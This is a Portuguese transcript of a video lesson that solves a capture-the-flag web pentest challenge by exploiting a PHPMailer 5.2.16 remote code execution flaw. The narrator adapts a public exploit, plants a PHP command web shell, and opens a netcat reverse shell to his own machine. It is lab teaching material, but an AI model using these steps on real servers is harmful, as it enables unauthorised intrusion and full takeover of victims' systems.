Fala galera, beleza? Ricardo Longato. E nesse vídeo eu vou trazer para vocês uma aula completa de uma exploração de uma vulnerabilidade do PHP Mailer. Então é uma falha bem interessante, muito encontrada inclusive, dependendo da versão que está sendo executada no servidor, existe a vulnerabilidade, né? E nessa aula eu explico como que você identifica a falha, como que você explora, corrige o exploit para poder fazer a falha funcionar ali e conseguir explorar o ambiente. Essa aula ela era de um campeonato que a gente fez aqui na DSEC, que tinha vários ambientes realísticos ali para o pessoal explorar, né? Então vou deixar essa aula agora completa para vocês verem. É a parte 1, depois eu posto a parte 2, que é a parte de escalação de privilégio, beleza? Vamos lá então. Nesse vídeo nós vamos começar a resolver os desafios de Pentest Web. Então, nós vamos para o primeiro desafio aqui, que é o Pentest Web valendo 100 pontos. E aqui é a parte 1, né? Então, a parte 1 ele fala o seguinte: Exim, que é o nome da empresa, é uma startup que não tem muito orçamento para investir em segurança, então eles mesmos criam tudo internamente. O CTO deles está preocupado com a segurança e pediu um teste de segurança na página que eles estão desenvolvendo. Então, se você conseguir explorar o servidor e conseguir a informação, eles vão conseguir demonstrar o impacto e conseguir um investimento aí para a área de segurança da informação. Então, o pentest contratado do tipo Black Box e a única informação que é passada é o endereço IP. Então, lembrando que nesse momento você já tem que estar com a conexão com a VPN ativa, ok? Então, nós iremos resolver esse primeiro desafio. Vou minimizar aqui e para o terminal. E aí é o seguinte. A primeira coisa que a gente vai fazer é rodar um Nmap aqui, um scanner de ports, para ver que serviços estão ativos nesse servidor. Eu vou rodar um scanner mais rápido aqui, mais básico mesmo, que é de conexões TCP. Então o ST aqui para conexões TCP. E ele é um scan bem rápido. Vocês vão ver que geralmente menos de 30 segundos ele executa esse scan aqui. Lembrando que nesse modo aqui ele não está fazendo o escaneamento completo, né, em todas as portas TCP. Ele está escaneando aí as 1000 portas mais usadas. Ó. Ele levou até menos, 15 segundos, e ele já trouxe aqui 2 serviços. Então, esse aqui é uma forma mais rápida, né? Como a gente está falando de um campeonato, a gente pode tentar essa primeira abordagem aqui para agilizar o processo de já tentar descobrir serviços ativos. Mas nem sempre isso vai resolver o problema. Muitas vezes o serviço pode estar rodando uma porta alta e aí você precisa usar a opção para ver todas as portas. Aqui a gente poderia rodar uma opção "-v" aqui para ver a versão do que está rodando aqui nessas 2 portas, por exemplo. E já pode começar a investigar esses serviços aqui antes de já começar a executar um scanner mais completo, mais demorado, ok? Então aqui ele mostra, por exemplo, que está rodando um Debian, então a gente já vê que é um Linux, né, porque está rodando SSH, e também um Apache aqui como web server. Então antes da gente até começar a fazer qualquer tipo de scanner mais avançado, a gente já pode ver o que está rodando nesse Apache aí. Então 172.30.0.125, esse é o IP do host. Vamos ver o que está rodando aqui. Está rodando um site aqui, aparentemente, como a gente viu na descrição lá, né? A empresa está preocupada com a segurança das páginas que eles estão desenvolvendo lá. A gente vê que tem um formulário aqui. Então, a primeira análise que a gente pode fazer aqui é diretamente aqui nessa página. Então, a gente vem aqui e começa a olhar código-fonte para ver se a gente encontra alguma informação interessante aqui. A gente vê alguns diretórios para começar a mapear a estrutura desse site. Então, CSS, JS. Aqui a gente vê que tem um formulário de contato, contact.php. A gente pode analisar isso também. Image, IMG, né? Então, a gente pode tentar acessar esses diretórios para ver como que a aplicação, né, a configuração se comporta. E aqui a gente vê que ele tem listagem de diretório ativo, ou seja, a gente consegue visualizar todos os diretórios que a gente está inserindo aqui, ó, IMG, como a gente viu ali, todos eles estão abrindo e a gente consegue visualizar os arquivos que tem aqui dentro. Beleza, o que a gente pode fazer
enquanto isso. A gente pode rodar um Derby aqui. Vou colocar aqui, ó, Derby. Vou limpar minha tela. HTTP. O Derby ele serve para a gente mapear diretórios nesse servidor, né? Então ele tem uma word list com centenas de nomes e ele vai ficar tentando encontrar esses arquivos aqui. Se o arquivo existir no servidor, ele vai conseguir mostrar para a gente. Então é uma forma mais rápida aí para a gente identificar e descobrir possíveis diretórios que sejam interessantes para a gente. Então a gente pode deixar o Derby rodando e pode fazer essa análise mais manual. Como a gente viu, ele tem um formulário aqui também, para colocar nome, e-mail, assunto e mensagem. A gente pode até testar esse formulário para ver se está funcionando. Então, dsec@dsec.com, o assunto hack, só para a gente testar. Enviar a mensagem, ele cai num contact.php, que tem os mesmos campos, entrar com o nome, com o e-mail, com o assunto e com a mensagem. A gente pode visualizar o código fonte dele aqui também, para a gente ver que ele está enviando via post, e aqui o nome de cada um dos campos, name, e-mail, message e subject. Então todos os nomes aqui dos campos e ele envia. Então a gente poderia testar por aqui, dsec@dsec.com.br, por exemplo, hack. Então só um teste. Vamos enviar. Mensagem foi enviada. Então a gente tem aqui um formulário de envio de e-mail. Até então parece muito simples, né? A gente não consegue ver nenhum vetor diretamente, né? Mas quem já tem um pouco de background técnico já pode continuar enumerando aqui para ver se encontra mais alguma informação. Vou esperar o Derby terminar de rodar aqui para a gente ver se a gente encontra mais alguma informação. Bom, o Derby terminou de rodar aqui. Ele encontrou alguns diretórios que a gente já tinha visto, outros que a gente não tinha visto, como por exemplo o vendor. Então vamos ver o que tem dentro desse vendor aqui. Vendor. E aqui dentro de vendor a gente consegue ver, por exemplo, PHP Mailer. A gente consegue ver já que ele está utilizando a PHP Mailer para fazer o envio daquele formulário que a gente acabou de ver. Isso é interessante. A gente tem um README aqui também que a gente pode verificar. Vou abrir ele aqui. PHP Mailer. Beleza. Tem a versão aqui também, que isso também é muito importante para a gente consegue ver a versão que está rodando aqui, que é o 5.2.16. Então, o que é o PHP Mailer? Basicamente, é o que o PHP usa para fazer uma função para envio de e-mail, né? Então, é muito comum CMS, como por exemplo Joomla, WordPress, ou até mesmo desenvolvimento proprietário ali, que o cara está programando em PHP, ele utilizar a função para envio de e-mail e ele utilizar o PHP Mailer para fazer o envio do e-mail. Só que acontece que existem vulnerabilidades no PHP Mailer. Então, como a gente viu ali, quando a gente consegue usar esse formulário aqui para envio de e-mail de contato normal do site, né? Isso básico. Mas como a gente viu, a gente tem aqui o PHP Mailer rodando nessa versão. Como que a gente vê se existe alguma vulnerabilidade, alguma falha? Forma mais simples aqui, a gente pode abrir o ExploitDB, por exemplo, exploitdb.com e digitar aqui, PHP Mailer e ver se ele retorna alguma coisa. Olha que interessante, ele retornou alguns exploits de RCE, né, Remote Code Execution, ou seja, explorando a falha do PHP Mailer nas versões abaixo de 5.2.18. Como a gente viu, a nossa versão é 5.2.16. Então já passa a ser interessante. A gente pode abrir alguns desses exploits aqui para analisar, entender um pouco melhor o que é essa falha aqui. Então, por exemplo, a gente tem um exploit aqui, feito pelo David. David, ele é um polonês, mas que estava morando no Brasil. Não sei se ele está morando ainda no Brasil, mas eu conheço ele. Conheci ele em um evento.
Na época que ele soltou um exploit do MySQL, inclusive. Bem interessante. E ele descobriu muito. Esse aqui é o site dele, legalhackers.com. Então vale a pena dar uma conferida aqui também. Mas esse é o processo, né? A gente sempre pesquisar e tentar entender o que o exploit faz, o que ele está fazendo. Então aqui ele está explicando, aqui ele dá uma explicação completa sobre a falha. A gente pode abrir aqui para a gente ler o artigo que ele fez sobre essa vulnerabilidade que ele descobriu, ver um vídeo aqui também. E aqui a gente tem o exploit. Ó. Então, talvez você não entenda de cara esse exploit, mas lendo aqui no site dele, deixa eu mostrar para vocês, aqui tem toda a explicação. Ó. O que é o PHP Mailer, onde ele é usado, e aqui tem toda a descrição, ó, explicando como a falha ocorre, por que ela ocorre, e aí ele explica, né, que um dos parâmetros aqui, dos argumentos, não são checados, né, quando ele utiliza o sendMail lá do lado do servidor para fazer o envio do e-mail, e aí você consegue colocar aqui, incluir no quinto parâmetro, coisas adicionais, injetar comandos adicionais. E é isso que essa falha faz, né? Ele descobriu que é possível injetar dados a fim da gente conseguir um RCE nesse servidor. Então vale a pena ler esse artigo inteiro aqui para você saber os detalhes da falha, tá? Existem vários exploits para explorar essa falha, como a gente viu aqui. E vamos testar esse aqui então, que é o mais básico mesmo. Vou copiar esse exploit aqui para minha máquina. Vou pôr exploit php mailer.py, que é um exploit em Python. Vou colar ele aqui. E aqui em cima, vou apagar esses comentários aqui. Deixar só exploit para ficar mais fácil de entender. Beleza. Aqui ele mostra aqui que é um diretório que tem a permissão de leitura e escrita. Aqui ele está colocando uploads, mas no nosso caso aqui não é uploads, porque a gente viu que a gente tem um outro diretório aqui, por exemplo, o vendor, ele é mais interessante para a gente. Então a gente pode colocar aqui o diretório como vendor. Então precisa de uma certa enumeração, por isso que é interessante você analisar o site antes, para você conseguir coletando informações para depois usar em uma possível falha como essa, ok? Aqui na URL a gente vai colocar o servidor nosso, então que a gente vai atacar, 7230.0.125, e o formulário de contato, no nosso caso aqui é contact.php. Um pouco mais abaixo ele dá aqui duas versões de payload que a gente pode utilizar, então ele tem aqui uma para a versão menor que 5.2.18, que é a que a gente vai atacar agora, e tem uma outra aqui que é para 20. Eu vou tentar esse primeiro exploit aqui, ok? E aqui a gente pode pôr o nome do código que a gente quer que ele crie lá no servidor. Vou pôr exploit no nome. E aqui o nome, você pode pôr qualquer coisa que você quiser. Por exemplo, dsec. E aqui ele montou o payload. E aqui mais abaixo a gente tem o código que a gente quer executar, que aqui nesse caso aqui vai ser um PHP info, só para mostrar. E aqui os campos do post, né, que ele vai fazer nesse contact.php. Se a gente rodar o exploit da forma que está, ele não vai funcionar. Por isso que é importante a gente entender e fazer essa numeração antes, para que a gente possa arrumar. Então, como a gente viu aqui na página, deixa eu abrir ela de novo aqui, o contact, ele tem vários campos, como a gente viu lá no código-fonte. Name, e-mail, subject e message. Então aqui a gente precisa colocar os mesmos campos. Então name, a gente pode pôr um nome que a gente quiser aqui. Por exemplo, sei lá, hacker. E-mail. Aí ele vai mandar o payload aqui no campo do e-mail. MSG não é MSG, é message. Se a gente olhar aqui, a gente vai ver que é message, ó. Certo? E tem o subject, que a gente precisa adicionar aqui no exploit também para ficar certinho. E aí a gente faz o seguinte, coloca ele aqui, ó, subject, 2 pontos, e qual vai ser o assunto aqui que a gente vai utilizar. Vou colocar aqui hack.
certo? Então, basicamente, a gente preparou o nosso exploit, né? Modificou, fez as alterações que a gente queria e agora a gente precisa testar. Então, só dar um catch aqui para vocês verem. Então, basicamente, ele vai jogar, se tudo correr bem, ele conseguir fazer o ataque, injetar, ele vai executar esse payload, vai executar esse código aqui, gravar isso dentro de um arquivo chamado exploit nesse diretório aqui. Então, vamos ver se vai funcionar. Python, XPL, vou executar, executei. E agora eu vou dentro do diretório vendor aqui ver se executou. Executou, ó, exploit.php. Ele criou um arquivo aqui dentro chamado exploit.php. Posso executar ele e legal, olha que interessante. Ele executou o PHP Info. Perfeito. Então, nesse momento aqui, a gente viu que o exploit funcionou. De fato, funcionou. Então, agora, a gente volta aqui e pode alterar esse exploit. Então, ao invés dele exibir um PHP Info, eu quero que ele faça... execute comandos, né? Então eu quero ter um controle maior aqui. Então eu posso fazer isso até via get, ó. E aí eu falo que eu quero, deixa eu colocar aqui, sei lá, cmd. Posso até fazer dessa forma aqui para ele pegar as aspas aqui e funcionar certinho. Certo? Então aqui eu estou criando um código em PHP que vai executar a função system, que executa comando do sistema operacional, via get, com o comando aqui com parâmetro argumento cmd, ok? E eu posso até alterar aqui, ó, o nome de exploit para, sei lá, POC, vou pôr POC, prova de conceito. Yes, salvei, vou executar novamente. Ao executar novamente, voltamos aqui para o diretório e vamos ver se ele criou o POC. Criou POC.php, vou clicar aqui nele. Beleza, ele apareceu um monte de coisa doida aqui, porque isso aqui é o quê? A gente executando o nosso payload aqui, né? Então, DSEC, como se estivesse enviando um e-mail, né, para DSEC, só que a gente está enviando o nosso payload malicioso e conseguindo executar códigos aqui no servidor. Nesse caso, ele mostra um monte de coisa aqui que pode parecer confuso, mas basta a gente passar os parâmetros como a gente viu aqui. Então, por exemplo, a gente colocou lá cmd, eu vou colocar id, ó. Vamos ver o que acontece. Aqui no final, olha que interessante, ó, o comando id foi executado. Certo? Posso vir aqui e colocar, sei lá, um outro comando, pwd, para mostrar o local onde ele está. Ó, local onde ele está aqui. Certo? Então, aqui eu já consigo execução de código remoto, né? Posso dar aqui um where is netcat para ver se ele tem netcat. Ó, deixa eu subir um pouco a tela. Where is mostra que a gente tem o netcat aqui nesses diretórios aqui, ó. Certo? Então, se a gente tem netcat, a gente pode já tentar fazer uma conexão reversa e ganhar acesso ao servidor. Então, vou abrir uma porta aqui na minha máquina. 443. Vou ver qual que é meu IP. Meu IP é esse daqui. Vou fechar aqui. Então, abri uma porta na minha máquina, 443. E agora eu vou fazer uma conexão reversa. Então, bin, nc, meu endereço de IP, porta 443 que eu defini, "-e para ele executar comando, bin, bash. Quando ele fica em espera assim, significa que é uma coisa boa, porque ele executou. E aqui a gente recebeu a conexão. Se eu der um ID agora, estou dentro desse servidor, ó. Acabamos de ganhar acesso ao servidor através da falha do PHP Mailer. Muito bom, né? E agora, nesse momento, a gente precisa procurar a flag, né? Onde estaria a informação confidencial que a gente tem que encontrar dentro desse servidor. Então, você poderia navegar aqui pelos diretórios, ó, pela raiz, pelo diretório home, por exemplo, começar a analisar o servidor, ver ó, que ele tem um outro usuário aqui, suporte, que ele tem um código aqui em base 64,
Você poderia tentar decifrar esse código base 64 ou entrar dentro desse diretório. Você poderia usar locate, você poderia subir uma shell um pouco melhor para você ter um acesso melhor nesse servidor. Então assim, aí vai muito da criatividade mesmo. Então só para a gente não perder muito tempo, aqui nesse caso tem esse diretório aqui em home. E dentro desse diretório aqui a gente tem um arquivo chamado information. Cat information. A gente tem a flag aqui. Basta copiar a flag. Voltar aqui para a plataforma. E ver se a flag bate. Lembrando que a gente tem que colocar o dsec. Abre e fecha chaves aqui. Acertamos e pontuamos. Ó. Nesse momento, então, fomos para 110 pontos, fechamos a primeira fase aqui do Pentest Web e estamos com acesso dentro desse servidor, ok? E agora no próximo vídeo, vou cancelar esse vídeo por aqui, no próximo vídeo a gente continua com a escalação de privilégios, que é a parte 2 aqui, para a gente continuar e fechar essa Web 30, ok? Até mais, pessoal!